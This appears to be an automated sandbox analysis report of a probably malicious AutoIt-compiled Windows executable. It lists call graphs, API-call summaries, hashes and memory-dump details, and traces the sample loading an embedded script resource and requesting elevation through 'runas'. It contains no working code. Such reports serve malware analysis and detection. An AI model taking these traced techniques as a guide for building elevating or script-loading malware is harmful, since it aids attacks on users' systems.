97179->97154 97180->97154 97183 35dd83 97182->97183 97184 35dd6f 97182->97184 97224 3c359c 82 API calls __wsopen_s 97183->97224 97223 35d260 239 API calls 2 library calls 97184->97223 97186 35dd7a 97186->97154 97188 3a2f75 97188->97188 97190 35e010 97189->97190 97208 35e0dc ISource 97190->97208 97227 370242 5 API calls __Init_thread_wait 97190->97227 97193 3a2fca 97195 35a961 22 API calls 97193->97195 97193->97208 97194 35a961 22 API calls 97194->97208 97198 3a2fe4 97195->97198 97228 3700a3 29 API calls __onexit 97198->97228 97200 3a2fee 97229 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97200->97229 97204 35ec40 239 API calls 97204->97208 97205 35a8c7 22 API calls 97205->97208 97206 3604f0 22 API calls 97206->97208 97207 35e3e1 97207->97154 97208->97194 97208->97204 97208->97205 97208->97206 97208->97207 97211 3c359c 82 API calls 97208->97211 97225 35a81b 41 API calls 97208->97225 97226 36a308 239 API calls 97208->97226 97230 370242 5 API calls __Init_thread_wait 97208->97230 97231 3700a3 29 API calls __onexit 97208->97231 97232 3701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97208->97232 97233 3d47d4 239 API calls 97208->97233 97234 3d68c1 239 API calls 97208->97234 97211->97208 97214 36ee12 97212->97214 97215 36ee09 97212->97215 97213 36ee36 IsDialogMessageW 97213->97214 97213->97215 97214->97213 97214->97215 97216 3aefaf GetClassLongW 97214->97216 97215->97154 97216->97213 97216->97214 97217->97154 97218->97154 97219->97154 97220->97162 97221->97162 97222->97162 97223->97186 97224->97188 97225->97208 97226->97208 97227->97193 97228->97200 97229->97208 97230->97208 97231->97208 97232->97208 97233->97208 97234->97208 97235 388402 97240 3881be 97235->97240 97237 38842a 97245 3881ef try_get_first_available_module 97240->97245 97242 3883ee 97259 3827ec 26 API calls pre_c_initialization 97242->97259 97244 388343 97244->97237 97252 390984 97244->97252 97245->97245 97248 388338 97245->97248 97255 378e0b 40 API calls 2 library calls 97245->97255 97247 38838c 97247->97248 97256 378e0b 40 API calls 2 library calls 97247->97256 97248->97244 97258 37f2d9 20 API calls _abort 97248->97258 97250 3883ab 97250->97248 97257 378e0b 40 API calls 2 library calls 97250->97257 97260 390081 97252->97260 97254 39099f 97254->97237 97255->97247 97256->97250 97257->97248 97258->97242 97259->97244 97262 39008d BuildCatchObjectHelperInternal 97260->97262 97261 39009b 97317 37f2d9 20 API calls _abort 97261->97317 97262->97261 97264 3900d4 97262->97264 97271 39065b 97264->97271 97265 3900a0 97318 3827ec 26 API calls pre_c_initialization 97265->97318 97270 3900aa __fread_nolock 97270->97254 97272 390678 97271->97272 97273 39068d 97272->97273 97274 3906a6 97272->97274 97334 37f2c6 20 API calls _abort 97273->97334 97320 385221 97274->97320 97277 390692 97335 37f2d9 20 API calls _abort 97277->97335 97278 3906ab 97279 3906cb 97278->97279 97280 3906b4 97278->97280 97333 39039a CreateFileW 97279->97333 97336 37f2c6 20 API calls _abort 97280->97336 97284 3906b9 97337 37f2d9 20 API calls _abort 97284->97337 97285 390781 GetFileType 97288 39078c GetLastError 97285->97288 97289 3907d3 97285->97289 97287 390756 GetLastError 97339 37f2a3 20 API calls 2 library calls 97287->97339 97340 37f2a3 20 API calls 2 library calls 97288->97340 97342 38516a 21 API calls 3 library calls 97289->97342 97290 390704 97290->97285 97290->97287 97338 39039a CreateFileW 97290->97338 97294 39079a CloseHandle 97294->97277 97297 3907c3 97294->97297 97296 390749 97296->97285 97296->97287 97341 37f2d9 20 API calls _abort 97297->97341 97298 3907f4 97300 390840 97298->97300 97343 3905ab 72 API calls 4 library calls 97298->97343 97305 39086d 97300->97305 97344 39014d 72 API calls 4 library calls 97300->97344 97301 3907c8 97301->97277 97304 390866 97304->97305 97306 39087e 97304->97306 97307 3886ae __wsopen_s 29 API calls 97305->97307 97308 3900f8 97306->97308 97309 3908fc CloseHandle 97306->97309 97307->97308 97319 390121 LeaveCriticalSection __wsopen_s 97308->97319 97345 39039a CreateFileW 97309->97345 97311 390927 97312 390931 GetLastError 97311->97312 97313 39095d 97311->97313 97346 37f2a3 20 API calls 2 library calls 97312->97346 97313->97308 97315 39093d 97347 385333 21 API calls 3 library calls 97315->97347 97317->97265 97318->97270 97319->97270 97321 38522d BuildCatchObjectHelperInternal 97320->97321 97348 382f5e EnterCriticalSection 97321->97348 97323 385259 97325 385000 __wsopen_s 21 API calls 97323->97325 97328 38525e 97325->97328 97326 3852a4 __fread_nolock 97326->97278 97327 385234 97327->97323 97329 3852c7 EnterCriticalSection 97327->97329 97331 38527b 97327->97331 97328->97331 97352 385147 EnterCriticalSection 97328->97352 97330 3852d4 LeaveCriticalSection 97329->97330 97329->97331 97330->97327 97349 38532a 97331->97349 97333->97290 97334->97277 97335->97308 97336->97284 97337->97277 97338->97296 97339->97277 97340->97294 97341->97301 97342->97298 97343->97300 97344->97304 97345->97311 97346->97315 97347->97313 97348->97327 97353 382fa6 LeaveCriticalSection 97349->97353 97351 385331 97351->97326 97352->97331 97353->97351 97354 392ba5 97355 352b25 97354->97355 97356 392baf 97354->97356 97382 352b83 7 API calls 97355->97382 97358 353a5a 24 API calls 97356->97358 97360 392bb8 97358->97360 97362 359cb3 22 API calls 97360->97362 97364 392bc6 97362->97364 97363 352b2f 97368 353837 49 API calls 97363->97368 97373 352b44 97363->97373 97365 392bce 97364->97365 97366 392bf5 97364->97366 97369 3533c6 22 API calls 97365->97369 97367 3533c6 22 API calls 97366->97367 97370 392bf1 GetForegroundWindow ShellExecuteW 97367->97370 97368->97373 97371 392bd9 97369->97371 97378 392c26 97370->97378 97375 356350 22 API calls 97371->97375 97372 352b5f 97380 352b66 SetCurrentDirectoryW 97372->97380 97373->97372 97386 3530f2 Shell_NotifyIconW ___scrt_fastfail 97373->97386 97376 392be7 97375->97376 97379 3533c6 22 API calls 97376->97379 97378->97372 97379->97370 97381 352b7a 97380->97381 97387 352cd4 7 API calls 97382->97387 97384 352b2a 97385 352c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 97384->97385 97385->97363 97386->97372 97387->97384

                                  Executed Functions

                                  Function 003542DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 234 3542de-35434d call 35a961 GetVersionExW call 356b57 239 354353 234->239 240 393617-39362a 234->240 241 354355-354357 239->241 242 39362b-39362f 240->242 245 35435d-3543bc call 3593b2 call 3537a0 241->245 246 393656 241->246 243 393631 242->243 244 393632-39363e 242->244 243->244 244->242 247 393640-393642 244->247 263 3937df-3937e6 245->263 264 3543c2-3543c4 245->264 250 39365d-393660 246->250 247->241 249 393648-39364f 247->249 249->240 252 393651 249->252 253 35441b-354435 GetCurrentProcess IsWow64Process 250->253 254 393666-3936a8 250->254 252->246 256 354494-35449a 253->256 257 354437 253->257 254->253 258 3936ae-3936b1 254->258 260 35443d-354449 256->260 257->260 261 3936db-3936e5 258->261 262 3936b3-3936bd 258->262 265 35444f-35445e LoadLibraryA 260->265 266 393824-393828 GetSystemInfo 260->266 270 3936f8-393702 261->270 271 3936e7-3936f3 261->271 267 3936ca-3936d6 262->267 268 3936bf-3936c5 262->268 272 3937e8 263->272 273 393806-393809 263->273 264->250 269 3543ca-3543dd 264->269 279 354460-35446e GetProcAddress 265->279 280 35449c-3544a6 GetSystemInfo 265->280 267->253 268->253 281 3543e3-3543e5 269->281 282 393726-39372f 269->282 275 393715-393721 270->275 276 393704-393710 270->276 271->253 274 3937ee 272->274 277 39380b-39381a 273->277 278 3937f4-3937fc 273->278 274->278 275->253 276->253 277->274 287 39381c-393822 277->287 278->273 279->280 288 354470-354474 GetNativeSystemInfo 279->288 289 354476-354478 280->289 283 39374d-393762 281->283 284 3543eb-3543ee 281->284 285 39373c-393748 282->285 286 393731-393737 282->286 292 39376f-39377b 283->292 293 393764-39376a 283->293 290 3543f4-35440f 284->290 291 393791-393794 284->291 285->253 286->253 287->278 288->289 294 354481-354493 289->294 295 35447a-35447b FreeLibrary 289->295 296 354415 290->296 297 393780-39378c 290->297 291->253 298 39379a-3937c1 291->298 292->253 293->253 295->294 296->253 297->253 299 3937ce-3937da 298->299 300 3937c3-3937c9 298->300 299->253 300->253
                                  APIs
                                  • GetVersionExW.KERNEL32(?), ref: 0035430D
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • GetCurrentProcess.KERNEL32(?,003ECB64,00000000,?,?), ref: 00354422
                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00354429
                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00354454
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00354466
                                  • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00354474
                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 0035447B
                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 003544A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                  • API String ID: 3290436268-3101561225
                                  • Opcode ID: 64331047ab52900702b38aa33434ef3bc8a7f564b7b25e948955e68182bf0ece
                                  • Instruction ID: 64a846a7aca5ebb6f8225a9637e68a27279936d95817fb503e677c569c47ce02
                                  • Opcode Fuzzy Hash: 64331047ab52900702b38aa33434ef3bc8a7f564b7b25e948955e68182bf0ece
                                  • Instruction Fuzzy Hash: FDA1D8A2B1A2C0CFEB37C76A7C845997FAA6F36304B8454B9DC41D7A71D230454BCB29
                                  Function 003542A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1378 3542a2-3542ba CreateStreamOnHGlobal 1379 3542bc-3542d3 FindResourceExW 1378->1379 1380 3542da-3542dd 1378->1380 1381 3935ba-3935c9 LoadResource 1379->1381 1382 3542d9 1379->1382 1381->1382 1383 3935cf-3935dd SizeofResource 1381->1383 1382->1380 1383->1382 1384 3935e3-3935ee LockResource 1383->1384 1384->1382 1385 3935f4-3935fc 1384->1385 1386 393600-393612 1385->1386 1386->1382
                                  APIs
                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,003550AA,?,?,00000000,00000000), ref: 003542B2
                                  • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003550AA,?,?,00000000,00000000), ref: 003542C9
                                  • LoadResource.KERNEL32(?,00000000,?,?,003550AA,?,?,00000000,00000000,?,?,?,?,?,?,00354F20), ref: 003935BE
                                  • SizeofResource.KERNEL32(?,00000000,?,?,003550AA,?,?,00000000,00000000,?,?,?,?,?,?,00354F20), ref: 003935D3
                                  • LockResource.KERNEL32(003550AA,?,?,003550AA,?,?,00000000,00000000,?,?,?,?,?,?,00354F20,?), ref: 003935E6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                  • String ID: SCRIPT
                                  • API String ID: 3051347437-3967369404
                                  • Opcode ID: 993b806a29b3e5e197fb1cd9d6aae8523e7a2b2113829ed69e309204c56f728a
                                  • Instruction ID: c0db68f11922146eb5334fb6870178bac5b823011f2e1ae3ea21f3c15f3735ba
                                  • Opcode Fuzzy Hash: 993b806a29b3e5e197fb1cd9d6aae8523e7a2b2113829ed69e309204c56f728a
                                  • Instruction Fuzzy Hash: 6011A070200301BFDB268B65DC88F2B7BBDEBC5B56F114A69F9028A1A0DB71E805C620
                                  Function 00392BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00352B6B
                                    • Part of subcall function 00353A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00421418,?,00352E7F,?,?,?,00000000), ref: 00353A78
                                    • Part of subcall function 00359CB3: _wcslen.LIBCMT ref: 00359CBD
                                  • GetForegroundWindow.USER32(runas,?,?,?,?,?,00412224), ref: 00392C10
                                  • ShellExecuteW.SHELL32(00000000,?,?,00412224), ref: 00392C17
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                  • String ID: runas
                                  • API String ID: 448630720-4000483414
                                  • Opcode ID: bf2f6fd9fdf6dd1c84e860b9a5242a5d74ba93e01c2fee5d56495bac108833ed
                                  • Instruction ID: b9f3172a1f9eb6ba68c08ca3475696db211308d810424404c318436d3406f0be
                                  • Opcode Fuzzy Hash: bf2f6fd9fdf6dd1c84e860b9a5242a5d74ba93e01c2fee5d56495bac108833ed
                                  • Instruction Fuzzy Hash: E711D631308345AAC717FF60D851EAE77A89FA5342F84142EF8865B0B3DF248A4EC752
                                  Function 003BDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrlenW.KERNEL32(?,00395222), ref: 003BDBCE
                                  • GetFileAttributesW.KERNELBASE(?), ref: 003BDBDD
                                  • FindFirstFileW.KERNELBASE(?,?), ref: 003BDBEE
                                  • FindClose.KERNEL32(00000000), ref: 003BDBFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                  • String ID:
                                  • API String ID: 2695905019-0
                                  • Opcode ID: f7e3db98c5f7235a8fa66e95954f52892e43c23c53cb8d1e0347f1b9114c42f8
                                  • Instruction ID: 1b8aec8d3689c1f9be980c936165ac115da820b1cf17d31148b556041ca1e0f4
                                  • Opcode Fuzzy Hash: f7e3db98c5f7235a8fa66e95954f52892e43c23c53cb8d1e0347f1b9114c42f8
                                  • Instruction Fuzzy Hash: 08F0A03082091057C2326B78AC4E8AE3B6C9E01338F104B02FA36C24E0FBB05D568695
                                  Function 0035BF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: BuffCharUpper
                                  • String ID: p#B
                                  • API String ID: 3964851224-2378950303
                                  • Opcode ID: a7143f1d6577786a05c5d0d992c07949fb9d28bb5308222079204c10d2486300
                                  • Instruction ID: 9a64cdbd55b0edce2229f264c32006ef34d2d8e859c6f80f21f05ab59d580595
                                  • Opcode Fuzzy Hash: a7143f1d6577786a05c5d0d992c07949fb9d28bb5308222079204c10d2486300
                                  • Instruction Fuzzy Hash: 1BA27C706183018FC716DF14C480B2ABBE5FF89308F15996DE89A8B362D775EC49CB92
                                  Function 0035D730 Relevance: 21.6, APIs: 14, Instructions: 621windowsleeptimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetInputState.USER32 ref: 0035D807
                                  • timeGetTime.WINMM ref: 0035DA07
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035DB28
                                  • TranslateMessage.USER32(?), ref: 0035DB7B
                                  • DispatchMessageW.USER32(?), ref: 0035DB89
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035DB9F
                                  • Sleep.KERNEL32(0000000A), ref: 0035DBB1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                  • String ID:
                                  • API String ID: 2189390790-0
                                  • Opcode ID: 47aae276e094a64523685ef4ed9ad97c4a0203664dd2e88f3c8094fe5bf0a8e9
                                  • Instruction ID: ec307fd30d7bb405fdd861c2bb8b0fb5ffc1ece0d4bfd92e777841b5c2eb8df2
                                  • Opcode Fuzzy Hash: 47aae276e094a64523685ef4ed9ad97c4a0203664dd2e88f3c8094fe5bf0a8e9
                                  • Instruction Fuzzy Hash: 9142C130608241DFD73BCF24C884FAAB7E5FF46315F158629E8568B2A1D770E848CB92
                                  Function 00352CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • GetSysColorBrush.USER32(0000000F), ref: 00352D07
                                  • RegisterClassExW.USER32(00000030), ref: 00352D31
                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00352D42
                                  • InitCommonControlsEx.COMCTL32(?), ref: 00352D5F
                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00352D6F
                                  • LoadIconW.USER32(000000A9), ref: 00352D85
                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00352D94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                  • API String ID: 2914291525-1005189915
                                  • Opcode ID: 29ec4f87b4172d1f5d3f7cf4a71f48d52d87112e4ea8a7f483e7eb83a1ce0be0
                                  • Instruction ID: 1c93ffec210a610533c7883440e625f765a5aacda1de34819c40aba12bc56863
                                  • Opcode Fuzzy Hash: 29ec4f87b4172d1f5d3f7cf4a71f48d52d87112e4ea8a7f483e7eb83a1ce0be0
                                  • Instruction Fuzzy Hash: E82129B5A11358EFDB21DF94EC88BDD7BB8FB08700F00422AF911AA2A0D7B05541CF54
                                  Function 00388D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 302 388d45-388d55 303 388d6f-388d71 302->303 304 388d57-388d6a call 37f2c6 call 37f2d9 302->304 306 3890d9-3890e6 call 37f2c6 call 37f2d9 303->306 307 388d77-388d7d 303->307 321 3890f1 304->321 326 3890ec call 3827ec 306->326 307->306 310 388d83-388dae 307->310 310->306 313 388db4-388dbd 310->313 314 388dbf-388dd2 call 37f2c6 call 37f2d9 313->314 315 388dd7-388dd9 313->315 314->326 319 388ddf-388de3 315->319 320 3890d5-3890d7 315->320 319->320 325 388de9-388ded 319->325 323 3890f4-3890f9 320->323 321->323 325->314 328 388def-388e06 325->328 326->321 331 388e08-388e0b 328->331 332 388e23-388e2c 328->332 333 388e0d-388e13 331->333 334 388e15-388e1e 331->334 335 388e4a-388e54 332->335 336 388e2e-388e45 call 37f2c6 call 37f2d9 call 3827ec 332->336 333->334 333->336 339 388ebf-388ed9 334->339 337 388e5b-388e79 call 383820 call 3829c8 * 2 335->337 338 388e56-388e58 335->338 366 38900c 336->366 375 388e7b-388e91 call 37f2d9 call 37f2c6 337->375 376 388e96-388ebc call 389424 337->376 338->337 341 388fad-388fb6 call 38f89b 339->341 342 388edf-388eef 339->342 353 388fb8-388fca 341->353 354 389029 341->354 342->341 347 388ef5-388ef7 342->347 347->341 351 388efd-388f23 347->351 351->341 356 388f29-388f3c 351->356 353->354 359 388fcc-388fdb GetConsoleMode 353->359 358 38902d-389045 ReadFile 354->358 356->341 361 388f3e-388f40 356->361 363 3890a1-3890ac GetLastError 358->363 364 389047-38904d 358->364 359->354 365 388fdd-388fe1 359->365 361->341 367 388f42-388f6d 361->367 369 3890ae-3890c0 call 37f2d9 call 37f2c6 363->369 370 3890c5-3890c8 363->370 364->363 371 38904f 364->371 365->358 372 388fe3-388ffd ReadConsoleW 365->372 373 38900f-389019 call 3829c8 366->373 367->341 374 388f6f-388f82 367->374 369->366 382 3890ce-3890d0 370->382 383 389005-38900b call 37f2a3 370->383 378 389052-389064 371->378 380 38901e-389027 372->380 381 388fff GetLastError 372->381 373->323 374->341 385 388f84-388f86 374->385 375->366 376->339 378->373 388 389066-38906a 378->388 380->378 381->383 382->373 383->366 385->341 392 388f88-388fa8 385->392 396 38906c-38907c call 388a61 388->396 397 389083-38908e 388->397 392->341 407 38907f-389081 396->407 402 38909a-38909f call 3888a1 397->402 403 389090 call 388bb1 397->403 408 389095-389098 402->408 403->408 407->373 408->407
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .7
                                  • API String ID: 0-287046593
                                  • Opcode ID: e11bfed3254fe63a240c0dbac6029fd858366ee8362d044cc703a5763e90e901
                                  • Instruction ID: 01a583c09d5a12f1d9ab369529fef015d367f9e7cbdf8cfa01da53e88db1f455
                                  • Opcode Fuzzy Hash: e11bfed3254fe63a240c0dbac6029fd858366ee8362d044cc703a5763e90e901
                                  • Instruction Fuzzy Hash: B1C1C4B4A043499FDB23EFA8D841BBDBBB4BF09310F1941DAE514AB392C7749941CB61
                                  Function 0039065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
